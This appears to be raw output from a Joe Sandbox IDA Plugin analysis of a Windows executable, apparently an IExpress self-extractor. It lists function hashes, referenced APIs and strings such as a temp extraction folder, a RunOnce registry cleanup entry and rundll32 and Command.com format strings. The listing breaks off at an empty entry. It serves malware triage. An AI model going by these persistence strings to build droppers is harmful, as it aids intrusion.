                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                        • API String ID: 178549006-2414900631
                                                                                                        • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                        • Instruction ID: 98f9c922f839c46493925be2bdf45b9b7ccce9e455f87b8d3c9ac0e3af25e634
                                                                                                        • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                        • Instruction Fuzzy Hash: 1B813C32A28AC686E710AB55E8443BAB7A1FB89F54F885132DA8E0B7D4DF3CD505C711

                                                                                                        Control-flow Graph

                                                                                                         • Executed / Not Executed basic-block graph for the function starting at 7ff7e6e81684 (rendered as an image; block listing not reproduced). Windows APIs referenced from its blocks: CompareStringA, GetFileAttributesA, LocalAlloc, GetPrivateProfileIntA, GetPrivateProfileStringA, GetShortPathNameA
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                         • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                        • String ID: .BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                        • API String ID: 383838535-981289760
                                                                                                        • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                        • Instruction ID: b440b852abc71ed7948fd6c0c004b6f8ac804348998c73f3bd6066376c63e359
                                                                                                        • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                        • Instruction Fuzzy Hash: F0E17D62A287C285EB11AB14E8443FBA7A1FB45B84FD84136DA8D0B7D5DF3DD509C311

                                                                                                        Control-flow Graph

                                                                                                         • Executed / Not Executed basic-block graph for the function starting at 7ff7e6e866c4 (rendered as an image; block listing not reproduced). Windows APIs referenced from its blocks: LocalAlloc, LocalFree, lstrcmpA, GetTempPathA, GetWindowsDirectoryA, GetDriveTypeA, GetFileAttributesA, GetDiskFreeSpaceA, MulDiv, CreateDirectoryA, SetFileAttributesA
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                         • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                        • API String ID: 3973824516-1216675450
                                                                                                        • Opcode ID: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                                                                        • Instruction ID: 451cc461acf7ff4e818d2a90f9e56dcc5b67a5be10a395c6e0615d5b0f7be54b
                                                                                                        • Opcode Fuzzy Hash: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                                                                        • Instruction Fuzzy Hash: D3D14322A286C286EB10AB14AC5077BE7A1FB85F44FD84136DACD4B6D5DF3DD405C722

                                                                                                        Control-flow Graph

                                                                                                         • Executed / Not Executed basic-block graph for the function starting at 7ff7e6e82db4 (rendered as an image; block listing not reproduced). Windows APIs referenced from its blocks: memset, CreateEventA, SetEvent, CreateMutexA, GetLastError, CloseHandle, FindResourceExA, LoadResource, plus one import by ordinal (#17)
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                         • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                         • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                        • String ID: $Adv$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                        • API String ID: 3100096412-78895606
                                                                                                        • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                        • Instruction ID: 0d24ba6da8cd8088c4a2a4e68d2ab880634dbe1c1d19188719193a0d5ab615ed
                                                                                                        • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                        • Instruction Fuzzy Hash: B0816E21E286C386F720BB54AC0177BE690BB95F54FD84037D98E4A6E5DF3CA405CB22

                                                                                                        Control-flow Graph

                                                                                                         • Executed / Not Executed basic-block graph for the function starting at 7ff7e6e86ca4 (rendered as an image; block listing not reproduced). Windows APIs referenced from its blocks: GetCurrentDirectoryA, SetCurrentDirectoryA, GetDiskFreeSpaceA, MulDiv, GetVolumeInformationA, memset, GetLastError, FormatMessageA
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                        • API String ID: 4237285672-1955631000
                                                                                                        • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                        • Instruction ID: e9015b8092fdb04f8612f7bfadad28fc1092abbd61df13095deb76661ce63362
                                                                                                        • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                        • Instruction Fuzzy Hash: 99A16436A2878186E720AF14E84476BFBA1FB89B44F984136DA8D4BBD4DF3CD405CB11

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                        • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                        • Instruction ID: 32b065744f6efedf3d1370fa4dfe2a8953d256439e8a1c0a2f2ab2f6702bbd97
                                                                                                        • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                        • Instruction Fuzzy Hash: 4D51FB31A28B8286EB50AB14AC54776E7A0FB89F45FD84137D98E4A6D5DF3CE005C722

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                        • API String ID: 3010855178-3095882572
                                                                                                        • Opcode ID: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                                                        • Instruction ID: cf554f752fc84ecac0340fbd414b3c25bcfb801531d2c7278e96a9f479bb106f
                                                                                                        • Opcode Fuzzy Hash: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                                                        • Instruction Fuzzy Hash: 87711A20E6C6C286FA60BB54AD45377E695BFA5F40FC84037D9CD4A2E1DE3CE8048662

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7E6E82CE1), ref: 00007FF7E6E8657C
                                                                                                        • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7E6E82CE1), ref: 00007FF7E6E8662F
                                                                                                        • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7E6E82CE1), ref: 00007FF7E6E8666F
                                                                                                          • Part of subcall function 00007FF7E6E863B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7E6E82CE1), ref: 00007FF7E6E86423
                                                                                                          • Part of subcall function 00007FF7E6E863B8: GetFileAttributesA.KERNELBASE ref: 00007FF7E6E86432
                                                                                                          • Part of subcall function 00007FF7E6E863B8: GetTempFileNameA.KERNEL32 ref: 00007FF7E6E8645B
                                                                                                          • Part of subcall function 00007FF7E6E863B8: DeleteFileA.KERNEL32 ref: 00007FF7E6E86473
                                                                                                          • Part of subcall function 00007FF7E6E863B8: CreateDirectoryA.KERNEL32 ref: 00007FF7E6E86484
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                        • API String ID: 1979080616-3881341942
                                                                                                        • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                                                        • Instruction ID: bfa041b1a294fb87adea056bc2d3b95aed50331e682c26a3b001734109fa9470
                                                                                                        • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                                                        • Instruction Fuzzy Hash: 3D515B61A397C281EA51AB25AC103BBE7A1BF45F40FDC4537C98E4A6D5DF3CE404C622

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                        • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                        • API String ID: 1302179841-1204263913
                                                                                                        • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                                                        • Instruction ID: 2a6f9875925b07cec0a5f08d9c86570c7a5823e646f84dd5860e909fbc7a31e6
                                                                                                        • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                                                        • Instruction Fuzzy Hash: 6E312D21E287C28AFA607B60AC45377EA90BF55F50FCC4137D98D0A6D5CF3CE8408A62
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                        • String ID:
                                                                                                        • API String ID: 836429354-0
                                                                                                        • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                        • Instruction ID: 7f46f6b7141761435a5cbfc99fa211953e4e209384735cd01d1f59057ad76700
                                                                                                        • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                        • Instruction Fuzzy Hash: CD518031A28AC189EB11AF20DC543EAA7A1FB45F84FC84172DA8E0B6D5DF3CD909C351
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 1214682469-0
                                                                                                        • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                                        • Instruction ID: 451d40668e51cb6a3f42b7f68be250edbfb69874a0d6f81c16184c4fdcf21026
                                                                                                        • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                                        • Instruction Fuzzy Hash: E2115431A18B8186EA109B15F84426AFAA1FB49FE1F8C4735DE9D0B7D4DF3CD4408B10

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                        • String ID: $Adv
                                                                                                        • API String ID: 2654313074-3776740653
                                                                                                        • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                        • Instruction ID: 5bdec61aa559caefa4458b978a4d189e2463950ff6355757c8a7fb3f3413f61f
                                                                                                        • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                        • Instruction Fuzzy Hash: 55517431D18AC286E7106B55ED4437AEA61FB89F55F889233C99E0BBD4CF3C94458712

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
• String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
• API String ID: 3049360512-2947520418
• Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
• Instruction ID: 241f17289ff3a60c6d49a6bd3e5f52e9183db7f01d5dbb9a3620d8aec2e4a3b5
• Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
• Instruction Fuzzy Hash: DB51FF21A286C286EA51AB14FC543BAF7A0FB85F45F8C4172D68D4B6D5DF3CD848C722

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-3916222277
• Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
• Instruction ID: 76368c629e4880684328a949cc9f577d5a931c2be0bb26997186bdc25629ac54
• Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
• Instruction Fuzzy Hash: 84516E329287C1C6E760AB14E85537BF7A0FB88B55F884136E68D4A6E4CF7CD444CB62

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: OpenQuery$CloseInfoValue
• String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
• API String ID: 2209512893-559176071
• Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
• Instruction ID: 02d901b94573ced9e9e4b49a99517620b208302ecd73e258c3a5015c022038b3
• Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
• Instruction Fuzzy Hash: AF319F32A18B82CAD7109F24FC406AAF7A4FB89B44F884536E68D07B94CF38D454CB51

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: IXP$IXP%03d.TMP
• API String ID: 1082909758-3932986939
• Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
• Instruction ID: 26a8263f8826bea92a16cf54671c872fb1aac306d8b9c02416a194d2cb7f7cad
• Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
• Instruction Fuzzy Hash: 3A212F31A189C186E610AB16BD543FAE791FB8AF91F888132DD8E4B7D5CF3CD445C612

APIs
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
• String ID:
• API String ID: 2995914023-0
• Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
• Instruction ID: 187acba5fc74f0a6fea179113941eb291c18ded6adbfe99ea799535785f3c323
• Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
• Instruction Fuzzy Hash: 37513B31928A8286E760AB65EC54377A3A0FB45F64FDC0432D98D8B6D5DF3CE841C762

APIs
  • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85078
  • Part of subcall function 00007FF7E6E85050: SizeofResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85089
  • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850AF
  • Part of subcall function 00007FF7E6E85050: LoadResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850C0
  • Part of subcall function 00007FF7E6E85050: LockResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850CF
  • Part of subcall function 00007FF7E6E85050: memcpy_s.MSVCRT ref: 00007FF7E6E850EE
  • Part of subcall function 00007FF7E6E85050: FreeResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850FD
• LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7E6E83123), ref: 00007FF7E6E860C9
• LocalFree.KERNEL32 ref: 00007FF7E6E86142
  • Part of subcall function 00007FF7E6E84DCC: LoadStringA.USER32 ref: 00007FF7E6E84E60
  • Part of subcall function 00007FF7E6E84DCC: MessageBoxA.USER32 ref: 00007FF7E6E84EA0
  • Part of subcall function 00007FF7E6E87700: GetLastError.KERNEL32 ref: 00007FF7E6E87704
Strings
Memory Dump Source
